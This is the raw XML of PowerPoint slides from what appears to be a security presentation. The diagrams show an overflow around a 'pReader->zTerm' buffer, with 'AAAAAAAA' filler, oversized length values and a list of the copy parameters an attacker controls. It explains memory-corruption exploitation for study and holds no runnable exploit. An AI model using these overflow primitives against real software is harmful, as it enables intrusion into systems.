                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167953"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0" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2388635" y="1760238"/>
            <a:ext cx="186456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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253197" y="1760238"/>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17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278294" y="1760770"/>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5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167953"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7FFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2388635" y="2649830"/>
            <a:ext cx="1864562" cy="89012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AAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253197" y="2649830"/>
            <a:ext cx="485187"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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278294" y="2650362"/>
            <a:ext cx="1110341" cy="88959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0x10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345233" y="4125446"/>
            <a:ext cx="3079102"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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (length = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>
            <a:ext cx="765110" cy="276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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pNext</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>
          </a:xfrm>
          <a:prstGeom prst="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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8531290" y="4105368"/>
            <a:ext cx="2124271" cy="261358"/>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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Doesn’t execute</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="5707176"/>
            <a:ext cx="5215813" cy="273746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="222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2957800" y="4524146"/>
            <a:ext cx="1772822"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Application Data</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562873" y="4524146"/>
            <a:ext cx="1184987" cy="500782"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="5064742"/>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2959834" y="5064742"/>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951722" y="5120286"/>
            <a:ext cx="1296956" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2248678" y="5304952"/>
            <a:ext cx="709124"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35" name="Straight Connector 34"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="167947" y="5304952"/>
            <a:ext cx="783775" cy="917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2957799" y="4524146"/>
            <a:ext cx="979718" cy="500782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212873908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What is controlled</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4808441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy start index of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy data size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792682" y="2723339"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9582535" y="2723339"/>
            <a:ext cx="1772822"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Application Data</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8187608" y="2723339"/>
            <a:ext cx="1184987" cy="500782"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792682" y="3263935"/>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9584569" y="3263935"/>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576457" y="3319479"/>
            <a:ext cx="1296956" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8873413" y="3504145"/>
            <a:ext cx="709124"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1" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6792682" y="3504145"/>
            <a:ext cx="783775" cy="917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9582534" y="2723339"/>
            <a:ext cx="979718" cy="500782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6795788" y="2445965"/>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7977669" y="2445965"/>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7020794" y="2268578"/>
            <a:ext cx="662477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6783157" y="2453244"/>
            <a:ext cx="237637"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7668983" y="2444275"/>
            <a:ext cx="313449"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9577088" y="2453244"/>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10563704" y="2453244"/>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9721128" y="2275857"/>
            <a:ext cx="662477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9583985" y="2460523"/>
            <a:ext cx="157257" cy="2457"/>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10374080" y="2451554"/>
            <a:ext cx="188067" cy="169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4695825" y="1835149"/>
            <a:ext cx="542925" cy="44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6" name="Elbow Connector 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="3"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238750" y="2056626"/>
            <a:ext cx="2113283" cy="211952"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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4431345" y="2876525"/>
            <a:ext cx="542925" cy="44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40" name="Elbow Connector 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="2"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6279205" y="1743081"/>
            <a:ext cx="369332" cy="3522127"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 161896"/>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2373945" y="3876650"/>
            <a:ext cx="542925" cy="44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43" name="Elbow Connector 42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="2"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5811158" y="58370"/>
            <a:ext cx="1095483" cy="7426985"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20868"/>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4" name="Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381125" y="4897022"/>
            <a:ext cx="1807208" cy="44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1" name="Elbow Connector 60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="3"/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3188333" y="2275857"/>
            <a:ext cx="6864034" cy="2842642"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 81585"/>
              <a:gd name="adj2" fmla="val 108042"/>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147858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What is controlled</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4808441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy start index of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy data size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
